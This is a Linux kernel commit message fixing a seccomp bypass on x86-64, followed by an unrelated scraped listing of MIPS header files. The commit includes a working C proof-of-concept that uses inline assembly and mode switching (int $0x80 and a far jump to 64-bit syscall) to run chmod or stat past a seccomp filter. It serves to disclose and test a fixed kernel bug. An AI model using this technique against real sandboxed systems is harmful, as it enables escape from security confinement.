5b1017404a
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process make a 32-bit system call with int $0x80.
In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
return 2;
}
Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
|
||
|---|---|---|
| .. | ||
| dec | ||
| emma | ||
| fw | ||
| ip32 | ||
| lasat | ||
| mach-au1x00 | ||
| mach-bcm47xx | ||
| mach-cavium-octeon | ||
| mach-cobalt | ||
| mach-db1x00 | ||
| mach-dec | ||
| mach-emma2rh | ||
| mach-excite | ||
| mach-generic | ||
| mach-ip22 | ||
| mach-ip27 | ||
| mach-ip28 | ||
| mach-ip32 | ||
| mach-jazz | ||
| mach-lasat | ||
| mach-lemote | ||
| mach-malta | ||
| mach-mipssim | ||
| mach-pb1x00 | ||
| mach-pnx833x | ||
| mach-pnx8550 | ||
| mach-rc32434 | ||
| mach-rm | ||
| mach-sibyte | ||
| mach-tx39xx | ||
| mach-tx49xx | ||
| mach-vr41xx | ||
| mach-wrppmc | ||
| mach-yosemite | ||
| mips-boards | ||
| octeon | ||
| pci | ||
| pmc-sierra/msp71xx | ||
| sgi | ||
| sibyte | ||
| sn | ||
| txx9 | ||
| vr41xx | ||
| xtalk | ||
| Kbuild | ||
| abi.h | ||
| addrspace.h | ||
| asm.h | ||
| asmmacro-32.h | ||
| asmmacro-64.h | ||
| asmmacro.h | ||
| atomic.h | ||
| auxvec.h | ||
| barrier.h | ||
| bcache.h | ||
| bitops.h | ||
| bootinfo.h | ||
| branch.h | ||
| break.h | ||
| bug.h | ||
| bugs.h | ||
| byteorder.h | ||
| cache.h | ||
| cachectl.h | ||
| cacheflush.h | ||
| cacheops.h | ||
| cevt-r4k.h | ||
| checksum.h | ||
| cmp.h | ||
| cmpxchg.h | ||
| compat-signal.h | ||
| compat.h | ||
| compiler.h | ||
| cpu-features.h | ||
| cpu-info.h | ||
| cpu.h | ||
| cputime.h | ||
| current.h | ||
| debug.h | ||
| delay.h | ||
| device.h | ||
| div64.h | ||
| dma-mapping.h | ||
| dma.h | ||
| ds1287.h | ||
| dsp.h | ||
| edac.h | ||
| elf.h | ||
| emergency-restart.h | ||
| errno.h | ||
| fb.h | ||
| fcntl.h | ||
| fixmap.h | ||
| floppy.h | ||
| fpregdef.h | ||
| fpu.h | ||
| fpu_emulator.h | ||
| futex.h | ||
| gcmpregs.h | ||
| gic.h | ||
| gpio.h | ||
| gt64120.h | ||
| hardirq.h | ||
| hazards.h | ||
| highmem.h | ||
| hw_irq.h | ||
| i8253.h | ||
| i8259.h | ||
| ide.h | ||
| inst.h | ||
| io.h | ||
| ioctl.h | ||
| ioctls.h | ||
| ipcbuf.h | ||
| irq.h | ||
| irq_cpu.h | ||
| irq_gt641xx.h | ||
| irq_regs.h | ||
| irqflags.h | ||
| isadep.h | ||
| jazz.h | ||
| jazzdma.h | ||
| kdebug.h | ||
| kexec.h | ||
| kgdb.h | ||
| kmap_types.h | ||
| kspd.h | ||
| linkage.h | ||
| local.h | ||
| m48t37.h | ||
| mc146818-time.h | ||
| mc146818rtc.h | ||
| mips_mt.h | ||
| mipsmtregs.h | ||
| mipsprom.h | ||
| mipsregs.h | ||
| mman.h | ||
| mmu.h | ||
| mmu_context.h | ||
| mmzone.h | ||
| module.h | ||
| msc01_ic.h | ||
| msgbuf.h | ||
| mutex.h | ||
| nile4.h | ||
| paccess.h | ||
| page.h | ||
| param.h | ||
| parport.h | ||
| pci.h | ||
| percpu.h | ||
| pgalloc.h | ||
| pgtable-32.h | ||
| pgtable-64.h | ||
| pgtable-bits.h | ||
| pgtable.h | ||
| pmon.h | ||
| poll.h | ||
| posix_types.h | ||
| prefetch.h | ||
| processor.h | ||
| ptrace.h | ||
| r4k-timer.h | ||
| r4kcache.h | ||
| reboot.h | ||
| reg.h | ||
| regdef.h | ||
| resource.h | ||
| rm9k-ocd.h | ||
| rtlx.h | ||
| scatterlist.h | ||
| seccomp.h | ||
| sections.h | ||
| segment.h | ||
| sembuf.h | ||
| serial.h | ||
| setup.h | ||
| sgialib.h | ||
| sgiarcs.h | ||
| sgidefs.h | ||
| shmbuf.h | ||
| shmparam.h | ||
| sigcontext.h | ||
| siginfo.h | ||
| signal.h | ||
| sim.h | ||
| smp-ops.h | ||
| smp.h | ||
| smtc.h | ||
| smtc_ipi.h | ||
| smtc_proc.h | ||
| smvp.h | ||
| sni.h | ||
| socket.h | ||
| sockios.h | ||
| sparsemem.h | ||
| spinlock.h | ||
| spinlock_types.h | ||
| stackframe.h | ||
| stacktrace.h | ||
| stat.h | ||
| statfs.h | ||
| string.h | ||
| suspend.h | ||
| swab.h | ||
| sysmips.h | ||
| system.h | ||
| termbits.h | ||
| termios.h | ||
| thread_info.h | ||
| time.h | ||
| timex.h | ||
| titan_dep.h | ||
| tlb.h | ||
| tlbdebug.h | ||
| tlbflush.h | ||
| topology.h | ||
| traps.h | ||
| txx9irq.h | ||
| txx9pio.h | ||
| txx9tmr.h | ||
| types.h | ||
| uaccess.h | ||
| ucontext.h | ||
| unaligned.h | ||
| unistd.h | ||
| user.h | ||
| vga.h | ||
| vpe.h | ||
| war.h | ||
| watch.h | ||
| wbflush.h | ||
| xor.h | ||